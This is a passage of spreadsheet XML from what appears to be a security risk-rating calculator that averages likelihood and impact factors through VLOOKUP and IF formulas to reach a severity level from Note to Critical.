    </row>
    <row r="3" customFormat="false" ht="15" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="A3" s="29" t="s">
        <v>372</v>
      </c>
      <c r="B3" s="29"/>
      <c r="C3" s="29"/>
      <c r="D3" s="29"/>
      <c r="E3" s="30"/>
      <c r="F3" s="29" t="s">
        <v>373</v>
      </c>
      <c r="G3" s="29"/>
      <c r="I3" s="0" t="s">
        <v>374</v>
      </c>
      <c r="J3" s="0" t="s">
        <v>375</v>
      </c>
    </row>
    <row r="4" customFormat="false" ht="15" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A4" s="31" t="s">
        <v>376</v>
      </c>
      <c r="B4" s="31"/>
      <c r="C4" s="31"/>
      <c r="D4" s="31"/>
      <c r="E4" s="32"/>
      <c r="F4" s="31" t="s">
        <v>377</v>
      </c>
      <c r="G4" s="31"/>
    </row>
    <row r="5" customFormat="false" ht="16" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A5" s="33" t="s">
        <v>378</v>
      </c>
      <c r="B5" s="34" t="s">
        <v>379</v>
      </c>
      <c r="C5" s="34"/>
      <c r="D5" s="34"/>
      <c r="E5" s="35" t="n">
        <f aca="false">VLOOKUP(B5,References!A2:B8,2,FALSE())</f>
        <v>3</v>
      </c>
      <c r="F5" s="33" t="s">
        <v>380</v>
      </c>
      <c r="G5" s="36" t="s">
        <v>381</v>
      </c>
      <c r="H5" s="37" t="n">
        <f aca="false">VLOOKUP(G5,References!A$11:B$16,2,FALSE())</f>
        <v>2</v>
      </c>
    </row>
    <row r="6" customFormat="false" ht="16" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A6" s="33" t="s">
        <v>382</v>
      </c>
      <c r="B6" s="38" t="s">
        <v>383</v>
      </c>
      <c r="C6" s="38"/>
      <c r="D6" s="38"/>
      <c r="E6" s="35" t="n">
        <f aca="false">VLOOKUP(B6,References!C2:D6,2,FALSE())</f>
        <v>4</v>
      </c>
      <c r="F6" s="33" t="s">
        <v>384</v>
      </c>
      <c r="G6" s="36" t="s">
        <v>385</v>
      </c>
      <c r="H6" s="37" t="n">
        <f aca="false">VLOOKUP(G6,References!C$11:D$17,2,FALSE())</f>
        <v>9</v>
      </c>
    </row>
    <row r="7" customFormat="false" ht="16" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A7" s="33" t="s">
        <v>386</v>
      </c>
      <c r="B7" s="38" t="s">
        <v>387</v>
      </c>
      <c r="C7" s="38"/>
      <c r="D7" s="38"/>
      <c r="E7" s="35" t="n">
        <f aca="false">VLOOKUP(B7,References!E2:F6,2,FALSE())</f>
        <v>0</v>
      </c>
      <c r="F7" s="33" t="s">
        <v>388</v>
      </c>
      <c r="G7" s="36" t="s">
        <v>389</v>
      </c>
      <c r="H7" s="37" t="n">
        <f aca="false">VLOOKUP(G7,References!E$11:F$16,2,FALSE())</f>
        <v>1</v>
      </c>
    </row>
    <row r="8" customFormat="false" ht="16" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A8" s="33" t="s">
        <v>390</v>
      </c>
      <c r="B8" s="38" t="s">
        <v>391</v>
      </c>
      <c r="C8" s="38"/>
      <c r="D8" s="38"/>
      <c r="E8" s="35" t="n">
        <f aca="false">VLOOKUP(B8,References!G3:H8,2,FALSE())</f>
        <v>2</v>
      </c>
      <c r="F8" s="33" t="s">
        <v>392</v>
      </c>
      <c r="G8" s="36" t="s">
        <v>393</v>
      </c>
      <c r="H8" s="37" t="n">
        <f aca="false">VLOOKUP(G8,References!G$11:H$16,2,FALSE())</f>
        <v>0</v>
      </c>
    </row>
    <row r="9" customFormat="false" ht="15" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="A9" s="33"/>
      <c r="B9" s="36"/>
      <c r="C9" s="36"/>
      <c r="D9" s="36"/>
      <c r="E9" s="35"/>
      <c r="F9" s="33"/>
      <c r="G9" s="36"/>
      <c r="H9" s="37"/>
    </row>
    <row r="10" customFormat="false" ht="15" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A10" s="31" t="s">
        <v>394</v>
      </c>
      <c r="B10" s="31"/>
      <c r="C10" s="31"/>
      <c r="D10" s="31"/>
      <c r="E10" s="32"/>
      <c r="F10" s="31" t="s">
        <v>395</v>
      </c>
      <c r="G10" s="31"/>
      <c r="H10" s="32"/>
    </row>
    <row r="11" customFormat="false" ht="16" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A11" s="33" t="s">
        <v>396</v>
      </c>
      <c r="B11" s="34" t="s">
        <v>397</v>
      </c>
      <c r="C11" s="34"/>
      <c r="D11" s="34"/>
      <c r="E11" s="35" t="n">
        <f aca="false">VLOOKUP(B11,References!I2:J7,2,FALSE())</f>
        <v>1</v>
      </c>
      <c r="F11" s="33" t="s">
        <v>398</v>
      </c>
      <c r="G11" s="36" t="s">
        <v>399</v>
      </c>
      <c r="H11" s="37" t="n">
        <f aca="false">VLOOKUP(G11,References!I$11:J$16,2,FALSE())</f>
        <v>3</v>
      </c>
    </row>
    <row r="12" customFormat="false" ht="16" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A12" s="33" t="s">
        <v>400</v>
      </c>
      <c r="B12" s="34" t="s">
        <v>401</v>
      </c>
      <c r="C12" s="34"/>
      <c r="D12" s="34"/>
      <c r="E12" s="35" t="n">
        <f aca="false">VLOOKUP(B12,References!K$2:L$7,2,FALSE())</f>
        <v>5</v>
      </c>
      <c r="F12" s="33" t="s">
        <v>402</v>
      </c>
      <c r="G12" s="36" t="s">
        <v>403</v>
      </c>
      <c r="H12" s="37" t="n">
        <f aca="false">VLOOKUP(G12,References!K$11:L$16,2,FALSE())</f>
        <v>4</v>
      </c>
    </row>
    <row r="13" customFormat="false" ht="16" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A13" s="33" t="s">
        <v>404</v>
      </c>
      <c r="B13" s="34" t="s">
        <v>405</v>
      </c>
      <c r="C13" s="34"/>
      <c r="D13" s="34"/>
      <c r="E13" s="35" t="n">
        <f aca="false">VLOOKUP(B13,References!M$2:N$7,2,FALSE())</f>
        <v>4</v>
      </c>
      <c r="F13" s="33" t="s">
        <v>406</v>
      </c>
      <c r="G13" s="36" t="s">
        <v>407</v>
      </c>
      <c r="H13" s="37" t="n">
        <f aca="false">VLOOKUP(G13,References!M$11:O$16,2,FALSE())</f>
        <v>5</v>
      </c>
    </row>
    <row r="14" customFormat="false" ht="16" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A14" s="33" t="s">
        <v>408</v>
      </c>
      <c r="B14" s="34" t="s">
        <v>409</v>
      </c>
      <c r="C14" s="34"/>
      <c r="D14" s="34"/>
      <c r="E14" s="35" t="n">
        <f aca="false">VLOOKUP(B14,References!O$2:P$7,2,FALSE())</f>
        <v>3</v>
      </c>
      <c r="F14" s="33" t="s">
        <v>410</v>
      </c>
      <c r="G14" s="36" t="s">
        <v>411</v>
      </c>
      <c r="H14" s="37" t="n">
        <f aca="false">VLOOKUP(G14,References!O$11:P$16,2,FALSE())</f>
        <v>3</v>
      </c>
    </row>
    <row r="15" customFormat="false" ht="15" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="E15" s="33"/>
    </row>
    <row r="16" customFormat="false" ht="15" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A16" s="39" t="s">
        <v>412</v>
      </c>
      <c r="B16" s="40" t="n">
        <f aca="false">IFERROR(AVERAGE(E5:E8,E11:E14),"All factors require a selection.")</f>
        <v>2.75</v>
      </c>
      <c r="C16" s="40"/>
      <c r="D16" s="40"/>
      <c r="E16" s="33"/>
      <c r="F16" s="41" t="s">
        <v>413</v>
      </c>
      <c r="G16" s="40" t="n">
        <f aca="false">IFERROR(AVERAGE(H5:H8,H11:H14),"All factors require a selection.")</f>
        <v>3.375</v>
      </c>
    </row>
    <row r="17" customFormat="false" ht="15" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A17" s="39"/>
      <c r="B17" s="40"/>
      <c r="C17" s="40"/>
      <c r="D17" s="40"/>
      <c r="F17" s="41"/>
      <c r="G17" s="40"/>
    </row>
    <row r="20" customFormat="false" ht="19" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="B20" s="42" t="s">
        <v>414</v>
      </c>
      <c r="C20" s="42"/>
      <c r="D20" s="42"/>
      <c r="E20" s="43" t="str">
        <f aca="false">IFERROR(IF(AND($B$16&lt;3,$G$16&lt;3),"Note",IF(OR(AND($B$16&lt;3,$G$16&gt;=3,$G$16&lt;6),AND($B$16&gt;=3,$B$16&lt;6,$G$16&lt;3)),"Low",IF(OR(AND($B16&lt;3,$G16&gt;=6),AND($B16&gt;=3,$B16&lt;6,$G16&gt;=3,$G16&lt;6),AND($B16&gt;=6,$G16&lt;3)),"MODERATE",IF(OR(AND($B16&gt;=6,$B16&gt;=3,$G16&lt;6),AND($B16&gt;=3,$B16&lt;6,$G16&gt;6)),"High","Critical")))),"Note")</f>
        <v>Low</v>
      </c>
      <c r="F20" s="43"/>
      <c r="G20" s="44"/>
    </row>
    <row r="22" customFormat="false" ht="15" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="B22" s="45" t="s">
        <v>360</v>
      </c>
      <c r="C22" s="45"/>
      <c r="D22" s="45"/>
    </row>
    <row r="23" customFormat="false" ht="15" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="A23" s="46" t="s">
        <v>361</v>
      </c>
      <c r="B23" s="47" t="str">
        <f aca="false">IF($G16&lt;3,"-&gt;Low&lt;-","Low")</f>
        <v>Low</v>
      </c>
      <c r="C23" s="47" t="str">
        <f aca="false">IF(AND($G16&gt;=3,$G16&lt;6),"-&gt;Moderate&lt;-","Moderate")</f>
        <v>-&gt;Moderate&lt;-</v>
      </c>
      <c r="D23" s="47" t="str">
        <f aca="false">IF($G16&gt;=6,"-&gt;High&lt;-","High")</f>
        <v>High</v>
      </c>
      <c r="F23" s="48"/>
    </row>
    <row r="24" customFormat="false" ht="13" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="A24" s="49" t="str">
        <f aca="false">IF($B16&lt;3,"-&gt;Low&lt;-","Low")</f>
        <v>-&gt;Low&lt;-</v>
      </c>
      <c r="B24" s="50" t="str">
        <f aca="false">IF(AND($B$16&lt;3,$G$16&lt;3),"-&gt;Note&lt;-","Note")</f>
        <v>Note</v>
      </c>
      <c r="C24" s="51" t="str">
        <f aca="false">IF(AND($B$16&lt;3,$G$16&gt;=3,$G$16&lt;6),"-&gt;Low&lt;-","Low")</f>
        <v>-&gt;Low&lt;-</v>
      </c>
      <c r="D24" s="52" t="str">
        <f aca="false">IF(AND($B16&lt;3,$G16&gt;=6),"-&gt;Moderate&lt;-","Moderate")</f>
        <v>Moderate</v>
      </c>
      <c r="F24" s="53"/>
    </row>
    <row r="25" customFormat="false" ht="13" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="A25" s="49" t="str">
        <f aca="false">IF(AND($B16&gt;=3,$B16&lt;6),"-&gt;Moderate&lt;-","Moderate")</f>
        <v>Moderate</v>
      </c>
      <c r="B25" s="51" t="str">
        <f aca="false">IF(AND($B$16&gt;=3,$B$16&lt;6,$G$16&lt;3),"-&gt;Low&lt;-","Low")</f>
        <v>Low</v>
      </c>
      <c r="C25" s="52" t="str">
        <f aca="false">IF(AND($B16&gt;=3,$B16&lt;6,$G16&gt;=3,$G16&lt;6),"-&gt;Moderate&lt;-","Moderate")</f>
        <v>Moderate</v>
      </c>
      <c r="D25" s="54" t="str">
        <f aca="false">IF(AND($B16&gt;=3,$B16&lt;6,$G16&gt;6),"-&gt;High&lt;-","High")</f>
        <v>High</v>
      </c>
      <c r="F25" s="53"/>
    </row>
    <row r="26" customFormat="false" ht="13" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="A26" s="49" t="str">
        <f aca="false">IF($B16&gt;=6,"-&gt;High&lt;-","High")</f>
        <v>High</v>
      </c>
      <c r="B26" s="52" t="str">
        <f aca="false">IF(AND($B16&gt;=6,$G16&lt;3),"-&gt;Moderate&lt;-","Moderate")</f>
        <v>Moderate</v>
      </c>
      <c r="C26" s="54" t="str">
        <f aca="false">IF(AND($B16&gt;=6,$B16&gt;=3,$G16&lt;6),"-&gt;High&lt;-","High")</f>
        <v>High</v>
      </c>
      <c r="D26" s="55" t="str">
        <f aca="false">IF(AND($B$16&gt;=6,$G$16&gt;=6),"-&gt;Critical&lt;-","Critical")</f>
        <v>Critical</v>
      </c>
    </row>
  </sheetData>
  <mergeCells count="22">
    <mergeCell ref="A1:G1"/>
    <mergeCell ref="A3:D3"/>
    <mergeCell ref="F3:G3"/>
    <mergeCell ref="A4:D4"/>
    <mergeCell ref="F4:G4"/>
    <mergeCell ref="B5:D5"/>
    <mergeCell ref="B6:D6"/>
    <mergeCell ref="B7:D7"/>
    <mergeCell ref="B8:D8"/>
    <mergeCell ref="A10:D10"/>
    <mergeCell ref="F10:G10"/>
    <mergeCell ref="B11:D11"/>
    <mergeCell ref="B12:D12"/>
    <mergeCell ref="B13:D13"/>
    <mergeCell ref="B14:D14"/>
    <mergeCell ref="A16:A17"/>
    <mergeCell ref="B16:D17"/>
    <mergeCell ref="F16:F17"/>
    <mergeCell ref="G16:G17"/>
    <mergeCell ref="B20:D20"/>
    <mergeCell ref="E20:F20"/>
    <mergeCell ref="B22:D22"/>
  </mergeCells>
  <conditionalFormatting sqref="E20:F20">
    <cfRule type="containsText" priority="2" operator="containsText" aboveAverage="0" equalAverage="0" bottom="0" percent="0" rank="0" text="critical" dxfId="5">
      <formula>NOT(ISERROR(SEARCH("critical",E20)))</formula>
    </cfRule>
    <cfRule type="containsText" priority="3" operator="containsText" aboveAverage="0" equalAverage="0" bottom="0" percent="0" rank="0" text="high" dxfId="6">
      <formula>NOT(ISERROR(SEARCH("high",E20)))</formula>
    </cfRule>
    <cfRule type="containsText" priority="4" operator="containsText" aboveAverage="0" equalAverage="0" bottom="0" percent="0" rank="0" text="moderate" dxfId="7">
      <formula>NOT(ISERROR(SEARCH("moderate",E20)))</formula>
    </cfRule>
    <cfRule type="containsText" priority="5" operator="containsText" aboveAverage="0" equalAverage="0" bottom="0" percent="0" rank="0" text="low" dxfId="8">
      <formula>NOT(ISERROR(SEARCH("low",E20)))</formula>
    </cfRule>
    <cfRule type="containsText" priority="6" operator="containsText" aboveAverage="0" equalAverage="0" bottom="0" percent="0" rank="0" text="Note" dxfId="9">
      <formula>NOT(ISERROR(SEARCH("Note",E20)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="A24:A26 B23:D23">
    <cfRule type="containsText" priority="7" operator="containsText" aboveAverage="0" equalAverage="0" bottom="0" percent="0" rank="0" text="&lt;" dxfId="10">
      <formula>NOT(ISERROR(SEARCH("&lt;",A23)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="B23:D26 A24:A26">
    <cfRule type="containsText" priority="8" operator="containsText" aboveAverage="0" equalAverage="0" bottom="0" percent="0" rank="0" text="&lt;" dxfId="11">
      <formula>NOT(ISERROR(SEARCH("&lt;",A23)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="C26">
    <cfRule type="containsText" priority="9" operator="containsText" aboveAverage="0" equalAverage="0" bottom="0" percent="0" rank="0" text="&lt;" dxfId="12">
      <formula>NOT(ISERROR(SEARCH("&lt;",C26)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="D25">
    <cfRule type="containsText" priority="10" operator="containsText" aboveAverage="0" equalAverage="0" bottom="0" percent="0" rank="0" text="&lt;" dxfId="13">
      <formula>NOT(ISERROR(SEARCH("&lt;",D25)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="C25">
    <cfRule type="containsText" priority="11" operator="containsText" aboveAverage="0" equalAverage="0" bottom="0" percent="0" rank="0" text="&lt;" dxfId="14">
      <formula>NOT(ISERROR(SEARCH("&lt;",C25)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="B26">
    <cfRule type="containsText" priority="12" operator="containsText" aboveAverage="0" equalAverage="0" bottom="0" percent="0" rank="0" text="&lt;" dxfId="15">
      <formula>NOT(ISERROR(SEARCH("&lt;",B26)))</formula>
    </cfRule>
  </conditionalFormatting>
  <dataValidations count="16">
    <dataValidation allowBlank="true" operator="between" showDropDown="false" showErrorMessage="true" showInputMessage="true" sqref="B5" type="list">
      <formula1>SkillRequired</formula1>
      <formula2>0</formula2>
    </dataValidation>
    <dataValidation allowBlank="true" operator="between" showDropDown="false" showErrorMessage="true" showInputMessage="true" sqref="B6:D6" type="list">
      <formula1>Motive</formula1>
      <formula2>0</formula2>
    </dataValidation>
    <dataValidation allowBlank="true" operator="between" showDropDown="false" showErrorMessage="true" showInputMessage="true" sqref="B7:D7" type="list">
      <formula1>Opportunity</formula1>
      <formula2>0</formula2>
    </dataValidation>
    <dataValidation allowBlank="true" operator="between" showDropDown="false" showErrorMessage="true" showInputMessage="true" sqref="B8:D9" type="list">
      <formula1>PopulationSize</formula1>
      <formula2>0</formula2>
    </dataValidation>
    <dataValidation allowBlank="true" operator="between" showDropDown="false" showErrorMessage="true" showInputMessage="true" sqref="G5" type="list">
      <formula1>LossofConfidentiality</formula1>
      <formula2>0</formula2>
    </dataValidation>
    <dataValidation allowBlank="true" operator="between" showDropDown="false" showErrorMessage="true" showInputMessage="true" sqref="G6" type="list">
      <formula1>LossofIntegrity</formula1>
      <formula2>0</formula2>
    </dataValidation>
    <dataValidation allowBlank="true" operator="between" showDropDown="false" showErrorMessage="true" showInputMessage="true" sqref="G7" type="list">
      <formula1>LossofAvailability</formula1>
      <formula2>0</formula2>
    </dataValidation>
    <dataValidation allowBlank="true" operator="between" showDropDown="false" showErrorMessage="true" showInputMessage="true" sqref="G8:G9" type="list">
      <formula1>LossofAccountability</formula1>
      <formula2>0</formula2>
    </dataValidation>
    <dataValidation allowBlank="true" operator="between" showDropDown="false" showErrorMessage="true" showInputMessage="true" sqref="B11:D11" type="list">
      <formula1>EasyofDiscovery</formula1>
      <formula2>0</formula2>
    </dataValidation>
    <dataValidation allowBlank="true" operator="between" showDropDown="false" showErrorMessage="true" showInputMessage="true" sqref="B12:D12" type="list">
      <formula1>EaseofExploit</formula1>
      <formula2>0</formula2>
    </dataValidation>
    <dataValidation allowBlank="true" operator="between" showDropDown="false" showErrorMessage="true" showInputMessage="true" sqref="B13:D13" type="list">
      <formula1>Awareness</formula1>
      <formula2>0</formula2>
    </dataValidation>
    <dataValidation allowBlank="true" operator="between" showDropDown="false" showErrorMessage="true" showInputMessage="true" sqref="B14:D14" type="list">
      <formula1>IntrusionDetection</formula1>
      <formula2>0</formula2>
    </dataValidation>
    <dataValidation allowBlank="true" operator="between" showDropDown="false" showErrorMessage="true" showInputMessage="true" sqref="G11" type="list">
      <formula1>FinancialDamage</formula1>
      <formula2>0</formula2>
    </dataValidation>
    <dataValidation allowBlank="true" operator="between" showDropDown="false" showErrorMessage="true" showInputMessage="true" sqref="G12" type="list">
      <formula1>ReputationDamage</formula1>
      <formula2>0</formula2>
    </dataValidation>
    <dataValidation allowBlank="true" operator="between" showDropDown="false" showErrorMessage="true" showInputMessage="true" sqref="G13" type="list">
      <formula1>NonCompliance</formula1>
      <formula2>0</formula2>
    </dataValidation>
    <dataValidation allowBlank="true" operator="between" showDropDown="false" showErrorMessage="true" showInputMessage="true" sqref="G14" type="list">
      <formula1>PolicyViolation</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N12" activeCellId="0" sqref="N12"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="8.83984375" defaultRowHeight="13" zeroHeight="false" outlineLevelRow="0" outlineLevelCol="0"/>
  <cols>
    <col collapsed="false" customWidth="true" hidden="false" outlineLevel="0" max="1" min="1" style="0" width="39.01"/>
    <col collapsed="false" customWidth="true" hidden="false" outlineLevel="0" max="2" min="2" style="0" width="2"/>
    <col collapsed="false" customWidth="true" hidden="false" outlineLevel="0" max="3" min="3" style="0" width="32.66"/>
    <col collapsed="false" customWidth="true" hidden="false" outlineLevel="0" max="4" min="4" style="0" width="2"/>
    <col collapsed="false" customWidth="true" hidden="false" outlineLevel="0" max="5" min="5" style="0" width="43.33"/>
    <col collapsed="false" customWidth="true" hidden="false" outlineLevel="0" max="6" min="6" style="0" width="2"/>
    <col collapsed="false" customWidth="true" hidden="false" outlineLevel="0" max="7" min="7" style="0" width="38.5"/>
    <col collapsed="false" customWidth="true" hidden="false" outlineLevel="0" max="8" min="8" style="0" width="2"/>
    <col collapsed="false" customWidth="true" hidden="false" outlineLevel="0" max="9" min="9" style="0" width="38.5"/>
    <col collapsed="false" customWidth="true" hidden="false" outlineLevel="0" max="10" min="10" style="0" width="2"/>
    <col collapsed="false" customWidth="true" hidden="false" outlineLevel="0" max="11" min="11" style="0" width="27.66"/>
    <col collapsed="false" customWidth="true" hidden="false" outlineLevel="0" max="12" min="12" style="0" width="2"/>
    <col collapsed="false" customWidth="true" hidden="false" outlineLevel="0" max="13" min="13" style="0" width="23.01"/>
    <col collapsed="false" customWidth="true" hidden="false" outlineLevel="0" max="14" min="14" style="0" width="2"/>
    <col collapsed="false" customWidth="true" hidden="false" outlineLevel="0" max="15" min="15" style="0" width="31.5"/>
    <col collapsed="false" customWidth="true" hidden="false" outlineLevel="0" max="16" min="16" style="0" width="2"/>
  </cols>
  <sheetData>
    <row r="1" customFormat="false" ht="16" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="A1" s="56" t="s">
        <v>378</v>
      </c>
      <c r="B1" s="37"/>
      <c r="C1" s="56" t="s">
        <v>382</v>
      </c>
      <c r="D1" s="37"/>
      <c r="E1" s="56" t="s">
        <v>386</v>
      </c>
      <c r="F1" s="37"/>
      <c r="G1" s="56" t="s">
        <v>390</v>
      </c>
      <c r="H1" s="37"/>
      <c r="I1" s="56" t="s">
        <v>396</v>
      </c>
      <c r="J1" s="37"/>
      <c r="K1" s="56" t="s">
        <v>400</v>
      </c>
      <c r="L1" s="37"/>
      <c r="M1" s="56" t="s">
        <v>404</v>
      </c>
      <c r="N1" s="37"/>
      <c r="O1" s="56" t="s">
        <v>408</v>
      </c>
      <c r="P1" s="37"/>
    </row>
    <row r="2" customFormat="false" ht="14" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="A2" s="37" t="s">
        <v>415</v>
      </c>
      <c r="B2" s="37" t="s">
        <v>416</v>
      </c>
      <c r="C2" s="37" t="s">
        <v>415</v>
      </c>
      <c r="D2" s="37" t="s">
        <v>416</v>
      </c>
      <c r="E2" s="37" t="s">
        <v>415</v>
      </c>
      <c r="F2" s="37" t="s">
        <v>416</v>
      </c>
      <c r="G2" s="37" t="s">
        <v>415</v>
      </c>
      <c r="H2" s="37" t="s">
        <v>416</v>
      </c>
      <c r="I2" s="37" t="s">
        <v>415</v>
      </c>
      <c r="J2" s="37" t="s">
        <v>416</v>
      </c>
      <c r="K2" s="37" t="s">
        <v>415</v>
      </c>
      <c r="L2" s="37" t="s">
        <v>416</v>
      </c>
      <c r="M2" s="37" t="s">
        <v>415</v>
      </c>
      <c r="N2" s="37" t="s">
        <v>416</v>
      </c>
      <c r="O2" s="37" t="s">
        <v>415</v>
      </c>
      <c r="P2" s="37" t="s">
        <v>416</v>
      </c>
    </row>
    <row r="3" customFormat="false" ht="14" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="A3" s="37" t="s">
        <v>393</v>
      </c>
      <c r="B3" s="37" t="n">
        <v>0</v>
      </c>
      <c r="C3" s="37" t="s">
        <v>393</v>
      </c>
      <c r="D3" s="37" t="n">
        <v>0</v>
      </c>
      <c r="E3" s="37" t="s">
        <v>387</v>
      </c>
      <c r="F3" s="37" t="n">
        <v>0</v>
      </c>
      <c r="G3" s="37" t="s">
        <v>393</v>
      </c>
      <c r="H3" s="37" t="n">
        <v>0</v>
      </c>
      <c r="I3" s="37" t="s">
        <v>393</v>
      </c>
      <c r="J3" s="37" t="n">
        <v>0</v>
      </c>
      <c r="K3" s="37" t="s">
        <v>393</v>
      </c>
      <c r="L3" s="37" t="n">
        <v>0</v>
      </c>
      <c r="M3" s="37" t="s">
        <v>393</v>
      </c>
      <c r="N3" s="37" t="n">
        <v>0</v>
      </c>
      <c r="O3" s="37" t="s">
        <v>393</v>
      </c>
      <c r="P3" s="37" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4" customFormat="false" ht="14" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="A4" s="37" t="s">
        <v>417</v>
      </c>
      <c r="B4" s="37" t="n">
        <v>1</v>
      </c>
      <c r="C4" s="37" t="s">
        <v>418</v>
      </c>
      <c r="D4" s="37" t="n">
        <v>1</v>
      </c>
      <c r="E4" s="37" t="s">
        <v>419</v>
      </c>
      <c r="F4" s="37" t="n">
        <v>4</v>
      </c>
      <c r="G4" s="37" t="s">
        <v>391</v>
      </c>
      <c r="H4" s="37" t="n">
        <v>2</v>
      </c>
      <c r="I4" s="37" t="s">
        <v>397</v>
      </c>
      <c r="J4" s="37" t="n">
        <v>1</v>
      </c>
      <c r="K4" s="37" t="s">
        <v>420</v>
      </c>
      <c r="L4" s="37" t="n">
        <v>1</v>
      </c>
      <c r="M4" s="37" t="s">
        <v>421</v>
      </c>
      <c r="N4" s="37" t="n">
        <v>1</v>
      </c>
      <c r="O4" s="37" t="s">
        <v>422</v>
      </c>
      <c r="P4" s="37" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5" customFormat="false" ht="14" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="A5" s="37" t="s">
        <v>379</v>
      </c>
      <c r="B5" s="37" t="n">
        <v>3</v>
      </c>
      <c r="C5" s="37" t="s">
        <v>383</v>
      </c>
      <c r="D5" s="37" t="n">
        <v>4</v>
      </c>
      <c r="E5" s="37" t="s">
        <v>423</v>
      </c>
      <c r="F5" s="37" t="n">
        <v>7</v>
      </c>
      <c r="G5" s="37" t="s">
        <v>424</v>
      </c>
      <c r="H5" s="37" t="n">
        <v>4</v>
      </c>
      <c r="I5" s="37" t="s">
        <v>425</v>
      </c>
      <c r="J5" s="37" t="n">
        <v>3</v>
      </c>
      <c r="K5" s="37" t="s">
        <v>425</v>
      </c>
      <c r="L5" s="37" t="n">
        <v>3</v>
      </c>
      <c r="M5" s="37" t="s">
        <v>405</v>
      </c>
      <c r="N5" s="37" t="n">
        <v>4</v>
      </c>
      <c r="O5" s="37" t="s">
        <v>409</v>
      </c>
      <c r="P5" s="37" t="n">
        <v>3</v>
      </c>
    </row>
    <row r="6" customFormat="false" ht="14" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="A6" s="37" t="s">
        <v>426</v>
      </c>
      <c r="B6" s="37" t="n">
        <v>5</v>
      </c>
      <c r="C6" s="37" t="s">
        <v>427</v>
      </c>
      <c r="D6" s="37" t="n">
        <v>9</v>
      </c>
      <c r="E6" s="37" t="s">
        <v>428</v>
      </c>
      <c r="F6" s="37" t="n">
        <v>9</v>
      </c>
      <c r="G6" s="37" t="s">
        <v>429</v>
      </c>
      <c r="H6" s="37" t="n">
        <v>5</v>
      </c>
      <c r="I6" s="37" t="s">
        <v>430</v>
      </c>
      <c r="J6" s="37" t="n">
        <v>7</v>
      </c>
      <c r="K6" s="37" t="s">
        <v>401</v>
      </c>
      <c r="L6" s="37" t="n">
        <v>5</v>
      </c>
      <c r="M6" s="37" t="s">
        <v>431</v>
      </c>
      <c r="N6" s="37" t="n">
        <v>6</v>
      </c>
      <c r="O6" s="37" t="s">
        <v>432</v>
      </c>
      <c r="P6" s="37" t="n">
        <v>8</v>
      </c>
    </row>
    <row r="7" customFormat="false" ht="14" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="A7" s="37" t="s">
        <v>433</v>
      </c>
      <c r="B7" s="37" t="n">
        <v>6</v>
      </c>
      <c r="C7" s="37"/>
      <c r="D7" s="37"/>
      <c r="E7" s="37"/>
      <c r="F7" s="37"/>
      <c r="G7" s="37" t="s">
        <v>434</v>
      </c>
      <c r="H7" s="37" t="n">
        <v>6</v>
      </c>
      <c r="I7" s="37" t="s">
        <v>435</v>
      </c>
      <c r="J7" s="37" t="n">
        <v>9</v>
      </c>
      <c r="K7" s="37" t="s">
        <v>435</v>
      </c>
      <c r="L7" s="37" t="n">
        <v>9</v>
      </c>
      <c r="M7" s="37" t="s">
        <v>436</v>
      </c>
      <c r="N7" s="37" t="n">
        <v>9</v>
      </c>
      <c r="O7" s="37" t="s">
        <v>437</v>
      </c>
      <c r="P7" s="37" t="n">
        <v>9</v>
      </c>
    </row>
    <row r="8" customFormat="false" ht="14" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="A8" s="37" t="s">
        <v>438</v>
      </c>
      <c r="B8" s="37" t="n">
        <v>9</v>
      </c>
      <c r="C8" s="37"/>
      <c r="D8" s="37"/>
      <c r="E8" s="37"/>
      <c r="F8" s="37"/>
      <c r="G8" s="37" t="s">
        <v>439</v>
      </c>
      <c r="H8" s="37" t="n">
        <v>9</v>
      </c>
      <c r="I8" s="37"/>
      <c r="J8" s="37"/>
      <c r="K8" s="37"/>
      <c r="L8" s="37"/>
      <c r="M8" s="37"/>
      <c r="N8" s="37"/>
      <c r="O8" s="37"/>
      <c r="P8" s="37"/>
    </row>
    <row r="10" customFormat="false" ht="16" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="A10" s="56" t="s">
        <v>380</v>
      </c>
      <c r="B10" s="56"/>
      <c r="C10" s="56" t="s">
